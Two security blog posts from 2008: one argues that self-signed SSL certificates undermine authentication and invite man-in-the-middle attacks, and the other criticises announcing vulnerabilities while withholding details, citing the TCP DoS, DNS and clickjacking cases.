So let’s go back to the original premise of the question and look a bit more technically at what’s going on. The argument is the desire to have encryption without authentication. That means the sensitivity and secrecy of the data is still an issue/desire, otherwise, why bother with encryption? The primary threat vector mitigated by end-to-end encryption on a network is passive eavesdropping (a.k.a. network sniffing). But keep in mind that, in SSL, the encryption keys are dynamically negotiated by the two endpoints at the start of the connection (after authentication has concluded). Thus encryption by itself offers no security value if the passive eavesdropping attacker decides to switch to an active man-in-the-middle or interception attack (which is technically viable if they were already in a position to eavesdrop your network traffic to begin with); this just means you are now negotiating an encryption key with the attacker and directly sending them your data. SSL normally mitigates these attacks by the use of authentication, to ensure the endpoint you negotiate your encryption key with is indeed who they say they are. However if we allow self-signed certificates to be used and therefore overlook the authentication aspect, there is zero guarantee that the person you just negotiated an encryption tunnel with isn’t the person you were trying to secure your information from (via encryption) in the first place. True, it does require the attacker to switch from a passive attack to an active attack, but that is of little consequence if the attacker truly wants to compromise the data. And attackers are already playing very active roles in attacks today (setting up an entire phishing site and sending out phishing emails isn’t exactly a passive affair…).

I have a hunch the real motive behind petitioning for self-signed certificate support is purely economic. Web site operators want to appear to conform to user expectations of security and privacy via the use of SSL (the whole “make sure the little lock icon appears in your browser before you send sensitive info” mantra), but without having to shell out cash for a real SSL certificate (if they just paid the money for a proper CA-signed certificate, this whole debate is moot). It’s the fa├žade of security without actually delivering on the promise. But those that are using self-signed SSL certificates for production uses, even prior to the newer crop of browsers handling them less favorably, are already doing a slight injustice to security as whole—because they are forcing a user to essentially make a “Yes I know this is insecure, please proceed anyways” decision. Accepting self-signed certificates in older browsers is usually just a semi-scary dialogue followed by a one-click override from the user….and apparently the protagonists of this debate believe this (was) acceptable for users to do. But isn’t that just exacerbating the phenomenon of users continually making bad security choices, by explicitly encouraging them to do so? We should not be encouraging users to bypass or override security protection mechanisms put there for their own good; what starts as an encouraged exception may eventually become an assumed norm (I’d like to make a Pavlov reference here, but I don’t want it seen as belittling the behavior or intelligence of users).

All of that said, I suppose there are some certain approaches that may offer a balanced compromise. If we look at SSH, we encounter the same basic problem: when the client first connects to the server, it doesn’t know if the server is actually the right server or not. So usually the client prompts the user with a small fingerprint of the server’s identity in order to verify that identity out-of-band. If the user instructs the client to proceed, the client caches the server’s identity fingerprint. From that point on, as long as the server’s identity fingerprint matches what is cached, life is good. If that identity fingerprint ever changes, then lots of security bells and whistles go off because something is afoot, such as a man-in-the-middle attack (or the server admin re-generated their identity information, which is not something done arbitrarily). Basically it reduces the “no-authentication” scenario down to only the very first, initial connection that the client makes to the server. An attacker would have one chance—and one chance only—to intercept that very first connection and supply impersonated credentials. But also keep in mind, if the attacker stops the interception ruse and allows the connections to proceed to the proper server, the client will immediately alert the user to something fishy because the server identity (as seen by the client) has changed. So an attacker can remain undetected if and only if they intercept that very first connection, and only for as long as they actively and continually intercept all future connections. That reduces the chance of successful attack to a very small window, and requires moderate effort on part of the attacker to remain undetected. Perhaps this approach could be adapted to browsers, where a self-signed certificate for a given site can be manually verified once (the first time), and then cached so that as long as the certificate doesn’t change, it can be assumed to be the same site. It is entirely a change to the client browser and how SSL certificates are validated; no SSL protocol or server-side changes are necessary.

But unless browsers were to enact such a change, the use of self-signed certificates in this day in age is a risky proposition. They are fine for testing purposes, but they should never be used in production with real users. An alternate approach to using self-signed certificates is to create your own CA (you can use the free OpenSSL suite to do so) and use your CA to sign your server certificates; then encourage your users to install your CA certificate. This at least maintains the integrity and security value of the SSL protocol, and would allow the users' browsers to function without any security warnings requiring user interaction. However, you must then guard your CA private keys thoroughly, as you have now because a trusted entity in the browser’s eyes; if your CA keys are stolen, it would allow attackers to generate arbitrary certificates that are signed by your CA. In other words, the attacker could create the equivalent of arbitrary self-signed certificates but would actually use you as the trusted signing authority, and since the users’ browsers now trust your CA, the browsers would inherently trust all of the attacker’s certificates.

Regardless of what you do, one thing is for certain: you do not want to be the weakest link in the security chain. SSL literally has a trust chain established by the use of authentication certificates, and trying to bypass authentication (and the associated trust chain) compromises all security (including encryption) offered by SSL. No one likes being identified as the weakest link, so save your company the PR trouble and just buy that SSL certificate from a proper CA. It’s what is best for everyone involved, and your wallet will recover.

- Jeff

Thursday, October 2, 2008

I Know Something You Don't Know

Responsible disclosure has produced an unwanted side effect. It's the 'I know something that you don't know' disclosure process. There seems to be an increasing trend in the security community to seek the attention provided by full disclosure but retain the praise given to those who stick to 'responsible disclosure'. I was reading an article today which discusses a purported universal TCP DoS attack discovered by Robert E. Lee and Jack Louis who are researchers with the Swedish security firm Outpost24. While they have disclosed the existence of the vulnerability, due to the widespread reach and implications of the issue, they've chosen to withhold details of the attack pending coordination with affected vendors. Based on what little I know of the attack and further insight provided by Robert Hansen, I have no doubt that I'll be thoroughly impressed once details of the attack are finally released. It does however make me uncomfortable to know that the clock is ticking and we can only sit on the sidelines to wait and see if motivated attackers are able to beat vendors to the punch and exploit this vulnerability before it can be patched.

Dan Kaminsky's DNS vulnerability taught us all a lesson that we should have already known - valuable information cannot be contained when others have the motivation and talent to obtain it. Any vulnerability that can be discovered by one researcher can be discovered by another. Stating that a vulnerability exists, simply increases the value of the information - everyone wants it and the race is on. Some will strive to be first, to use the information for personal gain, while others will join the race simply for the challenge. Regardless, once you pull the cork, you can't put the genie back in the bottle.

There are times, when we get stuck between a rock and a hard place. Take for example the situation that unfolded at the OWASP USA 2008 conference last week. Jeremiah Grossman and Robert 'RSnake' Hansen had planned to discuss a new browser attack known as clickjacking. However, at the request of Adobe, they agreed to alter the talk and not proceed with details, to allow Adobe additional time to address the vulnerability. Did they do the right thing? Only time will tell, but under the same conditions, I would have done the same thing. That said, should evidence of widespread clickjacking exploitation emerge, I would hope that Jeremiah and Robert will proceed with disclosing further details, despite the short term potential to exacerbate the problem. While I'm fine with gun control overall, once the war breaks out, I'd appreciate a weapon to defend my family.

The 'responsible disclosure' debate will go on forever and we'll never agree because we all have different motivations. I can buy into situations where full and open disclosure is the lesser of two evils and I can even accept that there are times when remaining silent is necessary. However, in my opinion, yelling 'fire' without saying where just increases the risk that we'll all get trampled.

I'm not naive, I too work for a startup and recognize that the marketing value of such a report is golden. It's far more valuable than any targeted lead-gen that you could ever afford. However, the press isn't going anywhere. They'll still be waiting, just as hungry as ever when coordinated disclosure does finally occur. There is an argument that early publicity will help bring additional vendors to the table to participate in the coordinated disclosure process. While that may be true, groups like CERT or MITRE are well positioned to assist with coordination and can do a great job without the additional hassles of public involvement.

We want to have our cake and eat it too. There's one problem with that - once you take out the cake, the greedy kids want a piece too - and they aren't going to be polite and wait for it to be handed out.

- michael